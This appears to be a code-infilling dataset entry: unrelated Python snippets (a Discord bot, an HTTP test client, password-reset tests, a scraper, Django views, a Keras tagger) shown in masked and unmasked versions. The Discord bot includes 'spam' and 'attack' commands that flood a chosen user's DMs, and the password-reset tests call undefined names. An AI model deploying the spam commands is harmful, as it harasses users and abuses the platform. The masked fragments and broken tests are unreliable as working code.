"step-2": "<mask token>\n\n\[email protected]\nasync def on_ready():\n print(f'Logged in as {bot.user.name}')\n\n\[email protected]()\nasync def ping(ctx):\n await ctx.send('pong')\n\n\[email protected]()\nasync def lucky(ctx):\n spamCount = random.randint(0, 50)\n for num in range(int(spamCount)):\n await ctx.message.author.send('ARE YOU FELLING LUCKY???')\n\n\[email protected]()\nasync def spam(ctx, spamCtx='spam', spamCount=1):\n for num in range(int(spamCount)):\n await ctx.send(str(spamCtx))\n\n\[email protected]()\nasync def attack(ctx, user: discord.User, *, message='GET SPAMMED NERD'):\n spamCount = 10\n for num in range(int(spamCount)):\n await user.send(message)\n\n\nif __name__ == '__main__':\n bot.run(os.environ['TOKEN'])\n",
"step-3": "<mask token>\nbot = commands.Bot(command_prefix='!')\n\n\[email protected]\nasync def on_ready():\n print(f'Logged in as {bot.user.name}')\n\n\[email protected]()\nasync def ping(ctx):\n await ctx.send('pong')\n\n\[email protected]()\nasync def lucky(ctx):\n spamCount = random.randint(0, 50)\n for num in range(int(spamCount)):\n await ctx.message.author.send('ARE YOU FELLING LUCKY???')\n\n\[email protected]()\nasync def spam(ctx, spamCtx='spam', spamCount=1):\n for num in range(int(spamCount)):\n await ctx.send(str(spamCtx))\n\n\[email protected]()\nasync def attack(ctx, user: discord.User, *, message='GET SPAMMED NERD'):\n spamCount = 10\n for num in range(int(spamCount)):\n await user.send(message)\n\n\nif __name__ == '__main__':\n bot.run(os.environ['TOKEN'])\n",
"step-4": "from discord.ext import commands\nimport discord\nimport os\nimport random\nbot = commands.Bot(command_prefix='!')\n\n\[email protected]\nasync def on_ready():\n print(f'Logged in as {bot.user.name}')\n\n\[email protected]()\nasync def ping(ctx):\n await ctx.send('pong')\n\n\[email protected]()\nasync def lucky(ctx):\n spamCount = random.randint(0, 50)\n for num in range(int(spamCount)):\n await ctx.message.author.send('ARE YOU FELLING LUCKY???')\n\n\[email protected]()\nasync def spam(ctx, spamCtx='spam', spamCount=1):\n for num in range(int(spamCount)):\n await ctx.send(str(spamCtx))\n\n\[email protected]()\nasync def attack(ctx, user: discord.User, *, message='GET SPAMMED NERD'):\n spamCount = 10\n for num in range(int(spamCount)):\n await user.send(message)\n\n\nif __name__ == '__main__':\n bot.run(os.environ['TOKEN'])\n",
"step-5": "from discord.ext import commands\nimport discord\nimport os\nimport random\n\nbot = commands.Bot(command_prefix=\"!\")\n\[email protected]\nasync def on_ready():\n print(f\"Logged in as {bot.user.name}\")\n\n\[email protected]()\nasync def ping(ctx):\n await ctx.send(\"pong\")\n\n\n# Lucky command, it picks a number between 0-50 and spams your dm's with that number\[email protected]()\nasync def lucky(ctx):\n spamCount = random.randint(0, 50)\n for num in range(int(spamCount)):\n await ctx.message.author.send(\"ARE YOU FELLING LUCKY???\")\n\n# Basic spam command, you can provide a message and specify how many messages\[email protected]()\nasync def spam(ctx, spamCtx=\"spam\", spamCount=1):\n for num in range(int(spamCount)):\n await ctx.send(str(spamCtx))\n\n# Lets you mention a specific user who would like to spam in their DM's, you can specify a message\[email protected]()\nasync def attack(ctx, user: discord.User, *, message=\"GET SPAMMED NERD\"):\n spamCount = 10\n for num in range(int(spamCount)):\n await user.send(message)\n\nif __name__ == \"__main__\":\n bot.run(os.environ['TOKEN'])",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
test_f.close()
<|reserved_special_token_0|>
expected_f.close()
assert len(inputs) == len(expecteds)
for i in range(len(inputs)):
connection.request('GET', '<start>%s<end>' % inputs[i])
response = connection.getresponse()
if response.status != 200:
print('Request failed for input: %s. Reason: %s' % (inputs[i],
response.reason))
output = response.read()
print('Output:', output)
print('Expected:', expecteds[i])
if expecteds[i] == output:
print('SUCCESS')
else:
print('FAILURE')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
http_server = 'localhost:8000'
connection = httplib.HTTPConnection(http_server)
test_file_path = 'test_input'
test_f = open(test_file_path)
inputs = test_f.readlines()
inputs = [x.strip() for x in inputs]
test_f.close()
expected_file_path = 'expected'
expected_f = open(expected_file_path)
expecteds = expected_f.readlines()
expecteds = [x.strip() for x in expecteds]
expected_f.close()
assert len(inputs) == len(expecteds)
for i in range(len(inputs)):
connection.request('GET', '<start>%s<end>' % inputs[i])
response = connection.getresponse()
if response.status != 200:
print('Request failed for input: %s. Reason: %s' % (inputs[i],
response.reason))
output = response.read()
print('Output:', output)
print('Expected:', expecteds[i])
if expecteds[i] == output:
print('SUCCESS')
else:
print('FAILURE')
<|reserved_special_token_1|>
import httplib
import sys
http_server = 'localhost:8000'
connection = httplib.HTTPConnection(http_server)
test_file_path = 'test_input'
test_f = open(test_file_path)
inputs = test_f.readlines()
inputs = [x.strip() for x in inputs]
test_f.close()
expected_file_path = 'expected'
expected_f = open(expected_file_path)
expecteds = expected_f.readlines()
expecteds = [x.strip() for x in expecteds]
expected_f.close()
assert len(inputs) == len(expecteds)
for i in range(len(inputs)):
connection.request('GET', '<start>%s<end>' % inputs[i])
response = connection.getresponse()
if response.status != 200:
print('Request failed for input: %s. Reason: %s' % (inputs[i],
response.reason))
output = response.read()
print('Output:', output)
print('Expected:', expecteds[i])
if expecteds[i] == output:
print('SUCCESS')
else:
print('FAILURE')
<|reserved_special_token_1|>
import httplib
import sys
http_server = "localhost:8000"
connection = httplib.HTTPConnection(http_server)
# Open test input.
test_file_path = "test_input"
test_f = open(test_file_path)
inputs = test_f.readlines()
inputs = [x.strip() for x in inputs]
test_f.close()
# Open expected input.
expected_file_path = "expected"
expected_f = open(expected_file_path)
expecteds = expected_f.readlines()
expecteds = [x.strip() for x in expecteds]
expected_f.close()
assert(len(inputs) == len(expecteds))
for i in range(len(inputs)):
connection.request("GET", ("<start>%s<end>" % inputs[i]))
response = connection.getresponse()
if response.status != 200:
print("Request failed for input: %s. Reason: %s" % (inputs[i], response.reason))
output = response.read()
print("Output:", output)
print("Expected:", expecteds[i])
if expecteds[i] == output:
print("SUCCESS")
else:
print("FAILURE")
|
flexible
|
{
"blob_id": "cd9b04a93d85ba0ee2a38b534386f9aec0ef6895",
"index": 5165,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ntest_f.close()\n<mask token>\nexpected_f.close()\nassert len(inputs) == len(expecteds)\nfor i in range(len(inputs)):\n connection.request('GET', '<start>%s<end>' % inputs[i])\n response = connection.getresponse()\n if response.status != 200:\n print('Request failed for input: %s. Reason: %s' % (inputs[i],\n response.reason))\n output = response.read()\n print('Output:', output)\n print('Expected:', expecteds[i])\n if expecteds[i] == output:\n print('SUCCESS')\n else:\n print('FAILURE')\n",
"step-3": "<mask token>\nhttp_server = 'localhost:8000'\nconnection = httplib.HTTPConnection(http_server)\ntest_file_path = 'test_input'\ntest_f = open(test_file_path)\ninputs = test_f.readlines()\ninputs = [x.strip() for x in inputs]\ntest_f.close()\nexpected_file_path = 'expected'\nexpected_f = open(expected_file_path)\nexpecteds = expected_f.readlines()\nexpecteds = [x.strip() for x in expecteds]\nexpected_f.close()\nassert len(inputs) == len(expecteds)\nfor i in range(len(inputs)):\n connection.request('GET', '<start>%s<end>' % inputs[i])\n response = connection.getresponse()\n if response.status != 200:\n print('Request failed for input: %s. Reason: %s' % (inputs[i],\n response.reason))\n output = response.read()\n print('Output:', output)\n print('Expected:', expecteds[i])\n if expecteds[i] == output:\n print('SUCCESS')\n else:\n print('FAILURE')\n",
"step-4": "import httplib\nimport sys\nhttp_server = 'localhost:8000'\nconnection = httplib.HTTPConnection(http_server)\ntest_file_path = 'test_input'\ntest_f = open(test_file_path)\ninputs = test_f.readlines()\ninputs = [x.strip() for x in inputs]\ntest_f.close()\nexpected_file_path = 'expected'\nexpected_f = open(expected_file_path)\nexpecteds = expected_f.readlines()\nexpecteds = [x.strip() for x in expecteds]\nexpected_f.close()\nassert len(inputs) == len(expecteds)\nfor i in range(len(inputs)):\n connection.request('GET', '<start>%s<end>' % inputs[i])\n response = connection.getresponse()\n if response.status != 200:\n print('Request failed for input: %s. Reason: %s' % (inputs[i],\n response.reason))\n output = response.read()\n print('Output:', output)\n print('Expected:', expecteds[i])\n if expecteds[i] == output:\n print('SUCCESS')\n else:\n print('FAILURE')\n",
"step-5": "import httplib\nimport sys\n\nhttp_server = \"localhost:8000\"\nconnection = httplib.HTTPConnection(http_server)\n\n# Open test input. \ntest_file_path = \"test_input\"\ntest_f = open(test_file_path)\ninputs = test_f.readlines()\ninputs = [x.strip() for x in inputs]\ntest_f.close()\n\n# Open expected input.\nexpected_file_path = \"expected\"\nexpected_f = open(expected_file_path)\nexpecteds = expected_f.readlines()\nexpecteds = [x.strip() for x in expecteds]\nexpected_f.close()\nassert(len(inputs) == len(expecteds))\t\n\nfor i in range(len(inputs)):\n connection.request(\"GET\", (\"<start>%s<end>\" % inputs[i]))\n response = connection.getresponse()\n if response.status != 200:\n print(\"Request failed for input: %s. Reason: %s\" % (inputs[i], response.reason))\n output = response.read()\n print(\"Output:\", output)\n print(\"Expected:\", expecteds[i])\n if expecteds[i] == output:\n print(\"SUCCESS\")\n else:\n print(\"FAILURE\")\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from auth_passwordreset_reset import auth_passwordreset_reset
from auth_register import auth_register
from data import *
import pytest
#invalid reset code
def test_auth_passwordreset_reset1():
#create a test account
register = auth_register("[email protected]", "Hello123", "First", "Last")
#call password reset request
auth_passwordreset_request("[email protected]")
#assuming that the code from the email was "WER123"
#this should not work as the code "ABS124" doesnt match "WER123"
with pytest.raises(ValueError, match='*Incorrect Reset Code*'):
auth_passwordreset_reset("ABS124", "SomePass")
#invalid password
def test_auth_passwordreset_reset2():
#create a test account
register = auth_register("[email protected]", "Hello123", "First", "Last")
#call password reset request
auth_passwordreset_request("[email protected]")
#assume that the code generated was "AUW624"
#these should not work as the new passowrd lengths are <5
with pytest.raises(ValueError, match='*Invalid Password Length*'):
auth_passwordreset_reset("AUW624", "")
auth_passwordreset_reset("AUW624", "nope")
#valid case
def test_auth_passwordreset_reset3():
#create a test account
register = auth_register("[email protected]", "Hello123", "First", "Last")
#call password reset request
auth_passwordreset_request("[email protected]")
#assume that the code generated was "AUW624"
auth_passwordreset_reset("AUW624", "Valispass12")
#test to see if password updated
assert new_user_password == "Valispass12"
#this sequence should successfully reset the password
|
normal
|
{
"blob_id": "a315d01f0fb16f0c74c447c07b76f33e6ff6427d",
"index": 9742,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_auth_passwordreset_reset1():\n register = auth_register('[email protected]', 'Hello123',\n 'First', 'Last')\n auth_passwordreset_request('[email protected]')\n with pytest.raises(ValueError, match='*Incorrect Reset Code*'):\n auth_passwordreset_reset('ABS124', 'SomePass')\n\n\n<mask token>\n\n\ndef test_auth_passwordreset_reset3():\n register = auth_register('[email protected]', 'Hello123',\n 'First', 'Last')\n auth_passwordreset_request('[email protected]')\n auth_passwordreset_reset('AUW624', 'Valispass12')\n assert new_user_password == 'Valispass12'\n",
"step-3": "<mask token>\n\n\ndef test_auth_passwordreset_reset1():\n register = auth_register('[email protected]', 'Hello123',\n 'First', 'Last')\n auth_passwordreset_request('[email protected]')\n with pytest.raises(ValueError, match='*Incorrect Reset Code*'):\n auth_passwordreset_reset('ABS124', 'SomePass')\n\n\ndef test_auth_passwordreset_reset2():\n register = auth_register('[email protected]', 'Hello123',\n 'First', 'Last')\n auth_passwordreset_request('[email protected]')\n with pytest.raises(ValueError, match='*Invalid Password Length*'):\n auth_passwordreset_reset('AUW624', '')\n auth_passwordreset_reset('AUW624', 'nope')\n\n\ndef test_auth_passwordreset_reset3():\n register = auth_register('[email protected]', 'Hello123',\n 'First', 'Last')\n auth_passwordreset_request('[email protected]')\n auth_passwordreset_reset('AUW624', 'Valispass12')\n assert new_user_password == 'Valispass12'\n",
"step-4": "from auth_passwordreset_reset import auth_passwordreset_reset\nfrom auth_register import auth_register\nfrom data import *\nimport pytest\n\n\ndef test_auth_passwordreset_reset1():\n register = auth_register('[email protected]', 'Hello123',\n 'First', 'Last')\n auth_passwordreset_request('[email protected]')\n with pytest.raises(ValueError, match='*Incorrect Reset Code*'):\n auth_passwordreset_reset('ABS124', 'SomePass')\n\n\ndef test_auth_passwordreset_reset2():\n register = auth_register('[email protected]', 'Hello123',\n 'First', 'Last')\n auth_passwordreset_request('[email protected]')\n with pytest.raises(ValueError, match='*Invalid Password Length*'):\n auth_passwordreset_reset('AUW624', '')\n auth_passwordreset_reset('AUW624', 'nope')\n\n\ndef test_auth_passwordreset_reset3():\n register = auth_register('[email protected]', 'Hello123',\n 'First', 'Last')\n auth_passwordreset_request('[email protected]')\n auth_passwordreset_reset('AUW624', 'Valispass12')\n assert new_user_password == 'Valispass12'\n",
"step-5": "from auth_passwordreset_reset import auth_passwordreset_reset\nfrom auth_register import auth_register\nfrom data import *\nimport pytest\n\n\n#invalid reset code\ndef test_auth_passwordreset_reset1():\n \n #create a test account\n register = auth_register(\"[email protected]\", \"Hello123\", \"First\", \"Last\")\n \n #call password reset request\n auth_passwordreset_request(\"[email protected]\")\n \n #assuming that the code from the email was \"WER123\"\n \n #this should not work as the code \"ABS124\" doesnt match \"WER123\"\n with pytest.raises(ValueError, match='*Incorrect Reset Code*'):\n auth_passwordreset_reset(\"ABS124\", \"SomePass\")\n \n#invalid password\ndef test_auth_passwordreset_reset2():\n\n #create a test account\n register = auth_register(\"[email protected]\", \"Hello123\", \"First\", \"Last\")\n \n #call password reset request\n auth_passwordreset_request(\"[email protected]\")\n \n #assume that the code generated was \"AUW624\"\n \n #these should not work as the new passowrd lengths are <5\n with pytest.raises(ValueError, match='*Invalid Password Length*'):\n auth_passwordreset_reset(\"AUW624\", \"\")\n auth_passwordreset_reset(\"AUW624\", \"nope\")\n \n#valid case\ndef test_auth_passwordreset_reset3():\n \n #create a test account\n register = auth_register(\"[email protected]\", \"Hello123\", \"First\", \"Last\")\n \n #call password reset request\n auth_passwordreset_request(\"[email protected]\")\n \n #assume that the code generated was \"AUW624\"\n auth_passwordreset_reset(\"AUW624\", \"Valispass12\") \n \n #test to see if password updated\n assert new_user_password == \"Valispass12\"\n #this sequence should successfully reset the password\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
from bs4 import BeautifulSoup
import urllib.request
import re
import math
url_header = "http://srh.bankofchina.com/search/whpj/search.jsp?erectDate=2016-01-25¬hing=2016-02-25&pjname=1314"
Webpage = urllib.request.urlopen(url_header).read()
Webpage=Webpage.decode('UTF-8')
# soup = BeautifulSoup(Webpage)
print (Webpage)
a=re.findall(r'var m_nRecordCount = (\d+)',str(Webpage))
print(a)
# page_count=soup.find('script')
# print(page_count)
total_page=math.ceil(int(a[0])/20)
print(total_page)
|
normal
|
{
"blob_id": "62a86bd33755510f0d71f4920e63be1a3ce8c563",
"index": 6304,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(Webpage)\n<mask token>\nprint(a)\n<mask token>\nprint(total_page)\n",
"step-3": "<mask token>\nurl_header = (\n 'http://srh.bankofchina.com/search/whpj/search.jsp?erectDate=2016-01-25¬hing=2016-02-25&pjname=1314'\n )\nWebpage = urllib.request.urlopen(url_header).read()\nWebpage = Webpage.decode('UTF-8')\nprint(Webpage)\na = re.findall('var m_nRecordCount = (\\\\d+)', str(Webpage))\nprint(a)\ntotal_page = math.ceil(int(a[0]) / 20)\nprint(total_page)\n",
"step-4": "from bs4 import BeautifulSoup\nimport urllib.request\nimport re\nimport math\nurl_header = (\n 'http://srh.bankofchina.com/search/whpj/search.jsp?erectDate=2016-01-25¬hing=2016-02-25&pjname=1314'\n )\nWebpage = urllib.request.urlopen(url_header).read()\nWebpage = Webpage.decode('UTF-8')\nprint(Webpage)\na = re.findall('var m_nRecordCount = (\\\\d+)', str(Webpage))\nprint(a)\ntotal_page = math.ceil(int(a[0]) / 20)\nprint(total_page)\n",
"step-5": "from bs4 import BeautifulSoup\nimport urllib.request\nimport re\nimport math\n\nurl_header = \"http://srh.bankofchina.com/search/whpj/search.jsp?erectDate=2016-01-25¬hing=2016-02-25&pjname=1314\"\nWebpage = urllib.request.urlopen(url_header).read()\nWebpage=Webpage.decode('UTF-8')\n# soup = BeautifulSoup(Webpage)\nprint (Webpage)\na=re.findall(r'var m_nRecordCount = (\\d+)',str(Webpage))\nprint(a)\n# page_count=soup.find('script')\n# print(page_count)\ntotal_page=math.ceil(int(a[0])/20)\nprint(total_page)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class MyLoginView(LoginView):
redirect_authenticated_user = True
template_name = 'login.html'
class HomeView(View):
def get(self, request, *args, **kwargs):
form = NewVacancyForm() if request.user.is_staff else NewResumeForm()
context = {'form': form, 'is_authenticated': request.user.
is_authenticated, 'is_staff': request.user.is_staff, 'username':
request.user.username}
return render(request, 'home.html', context=context)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MySignupView(CreateView):
form_class = UserCreationForm
success_url = 'login'
template_name = 'signup.html'
class MyLoginView(LoginView):
redirect_authenticated_user = True
template_name = 'login.html'
class HomeView(View):
def get(self, request, *args, **kwargs):
form = NewVacancyForm() if request.user.is_staff else NewResumeForm()
context = {'form': form, 'is_authenticated': request.user.
is_authenticated, 'is_staff': request.user.is_staff, 'username':
request.user.username}
return render(request, 'home.html', context=context)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MenuView(View):
<|reserved_special_token_0|>
class MySignupView(CreateView):
form_class = UserCreationForm
success_url = 'login'
template_name = 'signup.html'
class MyLoginView(LoginView):
redirect_authenticated_user = True
template_name = 'login.html'
class HomeView(View):
def get(self, request, *args, **kwargs):
form = NewVacancyForm() if request.user.is_staff else NewResumeForm()
context = {'form': form, 'is_authenticated': request.user.
is_authenticated, 'is_staff': request.user.is_staff, 'username':
request.user.username}
return render(request, 'home.html', context=context)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MenuView(View):
def get(self, request, *args, **kwargs):
context = {'is_authenticated': request.user.is_authenticated,
'username': request.user.username}
return render(request, 'main.html', context=context)
class MySignupView(CreateView):
form_class = UserCreationForm
success_url = 'login'
template_name = 'signup.html'
class MyLoginView(LoginView):
redirect_authenticated_user = True
template_name = 'login.html'
class HomeView(View):
def get(self, request, *args, **kwargs):
form = NewVacancyForm() if request.user.is_staff else NewResumeForm()
context = {'form': form, 'is_authenticated': request.user.
is_authenticated, 'is_staff': request.user.is_staff, 'username':
request.user.username}
return render(request, 'home.html', context=context)
<|reserved_special_token_1|>
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.views import LoginView
from django.shortcuts import render
from django.views import View
from django.views.generic import CreateView
from resume.forms import NewResumeForm
from vacancy.forms import NewVacancyForm
class MenuView(View):
def get(self, request, *args, **kwargs):
context = {
'is_authenticated': request.user.is_authenticated,
'username': request.user.username,
}
return render(request, 'main.html', context=context)
class MySignupView(CreateView):
form_class = UserCreationForm
success_url = 'login'
template_name = 'signup.html'
class MyLoginView(LoginView):
redirect_authenticated_user = True
template_name = 'login.html'
class HomeView(View):
def get(self, request, *args, **kwargs):
form = NewVacancyForm() if request.user.is_staff else NewResumeForm()
context = {
'form': form,
'is_authenticated': request.user.is_authenticated,
'is_staff': request.user.is_staff,
'username': request.user.username,
}
return render(request, 'home.html', context=context)
|
flexible
|
{
"blob_id": "a75691af17f6d1effd469d5c2ded340c71521ee1",
"index": 9310,
"step-1": "<mask token>\n\n\nclass MyLoginView(LoginView):\n redirect_authenticated_user = True\n template_name = 'login.html'\n\n\nclass HomeView(View):\n\n def get(self, request, *args, **kwargs):\n form = NewVacancyForm() if request.user.is_staff else NewResumeForm()\n context = {'form': form, 'is_authenticated': request.user.\n is_authenticated, 'is_staff': request.user.is_staff, 'username':\n request.user.username}\n return render(request, 'home.html', context=context)\n",
"step-2": "<mask token>\n\n\nclass MySignupView(CreateView):\n form_class = UserCreationForm\n success_url = 'login'\n template_name = 'signup.html'\n\n\nclass MyLoginView(LoginView):\n redirect_authenticated_user = True\n template_name = 'login.html'\n\n\nclass HomeView(View):\n\n def get(self, request, *args, **kwargs):\n form = NewVacancyForm() if request.user.is_staff else NewResumeForm()\n context = {'form': form, 'is_authenticated': request.user.\n is_authenticated, 'is_staff': request.user.is_staff, 'username':\n request.user.username}\n return render(request, 'home.html', context=context)\n",
"step-3": "<mask token>\n\n\nclass MenuView(View):\n <mask token>\n\n\nclass MySignupView(CreateView):\n form_class = UserCreationForm\n success_url = 'login'\n template_name = 'signup.html'\n\n\nclass MyLoginView(LoginView):\n redirect_authenticated_user = True\n template_name = 'login.html'\n\n\nclass HomeView(View):\n\n def get(self, request, *args, **kwargs):\n form = NewVacancyForm() if request.user.is_staff else NewResumeForm()\n context = {'form': form, 'is_authenticated': request.user.\n is_authenticated, 'is_staff': request.user.is_staff, 'username':\n request.user.username}\n return render(request, 'home.html', context=context)\n",
"step-4": "<mask token>\n\n\nclass MenuView(View):\n\n def get(self, request, *args, **kwargs):\n context = {'is_authenticated': request.user.is_authenticated,\n 'username': request.user.username}\n return render(request, 'main.html', context=context)\n\n\nclass MySignupView(CreateView):\n form_class = UserCreationForm\n success_url = 'login'\n template_name = 'signup.html'\n\n\nclass MyLoginView(LoginView):\n redirect_authenticated_user = True\n template_name = 'login.html'\n\n\nclass HomeView(View):\n\n def get(self, request, *args, **kwargs):\n form = NewVacancyForm() if request.user.is_staff else NewResumeForm()\n context = {'form': form, 'is_authenticated': request.user.\n is_authenticated, 'is_staff': request.user.is_staff, 'username':\n request.user.username}\n return render(request, 'home.html', context=context)\n",
"step-5": "from django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.views import LoginView\nfrom django.shortcuts import render\nfrom django.views import View\nfrom django.views.generic import CreateView\n\nfrom resume.forms import NewResumeForm\nfrom vacancy.forms import NewVacancyForm\n\n\nclass MenuView(View):\n def get(self, request, *args, **kwargs):\n context = {\n 'is_authenticated': request.user.is_authenticated,\n 'username': request.user.username,\n }\n return render(request, 'main.html', context=context)\n\n\nclass MySignupView(CreateView):\n form_class = UserCreationForm\n success_url = 'login'\n template_name = 'signup.html'\n\n\nclass MyLoginView(LoginView):\n redirect_authenticated_user = True\n template_name = 'login.html'\n\n\nclass HomeView(View):\n def get(self, request, *args, **kwargs):\n form = NewVacancyForm() if request.user.is_staff else NewResumeForm()\n context = {\n 'form': form,\n 'is_authenticated': request.user.is_authenticated,\n 'is_staff': request.user.is_staff,\n 'username': request.user.username,\n }\n return render(request, 'home.html', context=context)\n",
"step-ids": [
4,
6,
7,
8,
10
]
}
|
[
4,
6,
7,
8,
10
] |
<|reserved_special_token_0|>
def to_matrix(lines, token_to_id, max_len=None, pad=0, dtype='int32',
time_major=False):
"""Converts a list of names into rnn-digestable matrix with paddings added after the end"""
max_len = max_len or max(map(len, lines))
matrix = np.empty([len(lines), max_len], dtype)
matrix.fill(pad)
for i in range(len(lines)):
line_ix = list(map(token_to_id.__getitem__, lines[i]))[:max_len]
matrix[i, :len(line_ix)] = line_ix
return matrix.T if time_major else matrix
<|reserved_special_token_0|>
def generate_batches(sentences, batch_size=BATCH_SIZE, max_len=None, pad=0):
assert isinstance(sentences, np.ndarray
), 'Make sure sentences is q numpy array'
while True:
indices = np.random.permutation(np.arange(len(sentences)))
for start in range(0, len(indices) - 1, batch_size):
batch_indices = indices[start:start + batch_size]
batch_words, batch_tags = [], []
for sent in sentences[batch_indices]:
words, tags = zip(*sent)
batch_words.append(words)
batch_tags.append(tags)
batch_words = to_matrix(batch_words, word_to_id, max_len, pad)
batch_tags = to_matrix(batch_tags, tag_to_id, max_len, pad)
batch_tags_1hot = to_categorical(batch_tags, len(all_tags)
).reshape(batch_tags.shape + (-1,))
yield batch_words, batch_tags_1hot
<|reserved_special_token_0|>
class EvaluateAccuracy(keras.callbacks.Callback):
def on_epoch_end(self, epoch, logs=None):
sys.stdout.flush()
print('\nMeasuring validation accuracy...')
acc = compute_test_accuracy(self.model)
print('\nValidation accuracy: %.5f\n' % acc)
sys.stdout.flush()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def to_matrix(lines, token_to_id, max_len=None, pad=0, dtype='int32',
time_major=False):
"""Converts a list of names into rnn-digestable matrix with paddings added after the end"""
max_len = max_len or max(map(len, lines))
matrix = np.empty([len(lines), max_len], dtype)
matrix.fill(pad)
for i in range(len(lines)):
line_ix = list(map(token_to_id.__getitem__, lines[i]))[:max_len]
matrix[i, :len(line_ix)] = line_ix
return matrix.T if time_major else matrix
<|reserved_special_token_0|>
def generate_batches(sentences, batch_size=BATCH_SIZE, max_len=None, pad=0):
assert isinstance(sentences, np.ndarray
), 'Make sure sentences is q numpy array'
while True:
indices = np.random.permutation(np.arange(len(sentences)))
for start in range(0, len(indices) - 1, batch_size):
batch_indices = indices[start:start + batch_size]
batch_words, batch_tags = [], []
for sent in sentences[batch_indices]:
words, tags = zip(*sent)
batch_words.append(words)
batch_tags.append(tags)
batch_words = to_matrix(batch_words, word_to_id, max_len, pad)
batch_tags = to_matrix(batch_tags, tag_to_id, max_len, pad)
batch_tags_1hot = to_categorical(batch_tags, len(all_tags)
).reshape(batch_tags.shape + (-1,))
yield batch_words, batch_tags_1hot
def compute_test_accuracy(model):
test_words, test_tags = zip(*[zip(*sentence) for sentence in test_data])
test_words, test_tags = to_matrix(test_words, word_to_id), to_matrix(
test_tags, tag_to_id)
predicted_tag_probabilities = model.predict(test_words, verbose=1)
predicted_tags = predicted_tag_probabilities.argmax(axis=-1)
numerator = np.sum(np.logical_and(predicted_tags == test_tags,
test_words != 0))
denominator = np.sum(test_words != 0)
return float(numerator) / denominator
class EvaluateAccuracy(keras.callbacks.Callback):
def on_epoch_end(self, epoch, logs=None):
sys.stdout.flush()
print('\nMeasuring validation accuracy...')
acc = compute_test_accuracy(self.model)
print('\nValidation accuracy: %.5f\n' % acc)
sys.stdout.flush()
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sys.path.append('..')
<|reserved_special_token_0|>
helpers.mask_busy_gpus(wait=False)
<|reserved_special_token_0|>
nltk.download('brown')
nltk.download('universal_tagset')
<|reserved_special_token_0|>
for sentence in data:
words, tags = zip(*sentence)
word_counts.update(words)
<|reserved_special_token_0|>
print('Coverage = %.5f' % (float(sum(word_counts[w] for w in all_words)) /
sum(word_counts.values())))
<|reserved_special_token_0|>
def to_matrix(lines, token_to_id, max_len=None, pad=0, dtype='int32',
time_major=False):
"""Converts a list of names into rnn-digestable matrix with paddings added after the end"""
max_len = max_len or max(map(len, lines))
matrix = np.empty([len(lines), max_len], dtype)
matrix.fill(pad)
for i in range(len(lines)):
line_ix = list(map(token_to_id.__getitem__, lines[i]))[:max_len]
matrix[i, :len(line_ix)] = line_ix
return matrix.T if time_major else matrix
<|reserved_special_token_0|>
print('Word ids:')
print(to_matrix(batch_words, word_to_id))
print('Tag ids:')
print(to_matrix(batch_tags, tag_to_id))
<|reserved_special_token_0|>
def generate_batches(sentences, batch_size=BATCH_SIZE, max_len=None, pad=0):
assert isinstance(sentences, np.ndarray
), 'Make sure sentences is q numpy array'
while True:
indices = np.random.permutation(np.arange(len(sentences)))
for start in range(0, len(indices) - 1, batch_size):
batch_indices = indices[start:start + batch_size]
batch_words, batch_tags = [], []
for sent in sentences[batch_indices]:
words, tags = zip(*sent)
batch_words.append(words)
batch_tags.append(tags)
batch_words = to_matrix(batch_words, word_to_id, max_len, pad)
batch_tags = to_matrix(batch_tags, tag_to_id, max_len, pad)
batch_tags_1hot = to_categorical(batch_tags, len(all_tags)
).reshape(batch_tags.shape + (-1,))
yield batch_words, batch_tags_1hot
def compute_test_accuracy(model):
test_words, test_tags = zip(*[zip(*sentence) for sentence in test_data])
test_words, test_tags = to_matrix(test_words, word_to_id), to_matrix(
test_tags, tag_to_id)
predicted_tag_probabilities = model.predict(test_words, verbose=1)
predicted_tags = predicted_tag_probabilities.argmax(axis=-1)
numerator = np.sum(np.logical_and(predicted_tags == test_tags,
test_words != 0))
denominator = np.sum(test_words != 0)
return float(numerator) / denominator
class EvaluateAccuracy(keras.callbacks.Callback):
def on_epoch_end(self, epoch, logs=None):
sys.stdout.flush()
print('\nMeasuring validation accuracy...')
acc = compute_test_accuracy(self.model)
print('\nValidation accuracy: %.5f\n' % acc)
sys.stdout.flush()
<|reserved_special_token_0|>
model.add(L.InputLayer([None], dtype='int32'))
model.add(L.Embedding(len(all_words), 50))
model.add(L.TimeDistributed(L.Dense(96, activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.TimeDistributed(L.Dense(96, activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=
'tanh', recurrent_dropout=0.2, dropout=0.2)))
model.add(L.TimeDistributed(L.Dense(128, activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.TimeDistributed(L.Dense(128, activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=
'tanh', recurrent_dropout=0.2, dropout=0.2)))
model.add(L.TimeDistributed(L.Dense(128, activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.TimeDistributed(L.Dense(128, activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=
'tanh', recurrent_dropout=0.2, dropout=0.2)))
model.add(L.Conv1D(128, 2, padding='same', activation='tanh'))
model.add(L.Dropout(0.2))
model.add(L.Conv1D(128, 3, padding='same', activation='tanh'))
model.add(L.Dropout(0.2))
model.add(L.Conv1D(128, 4, padding='same', activation='tanh'))
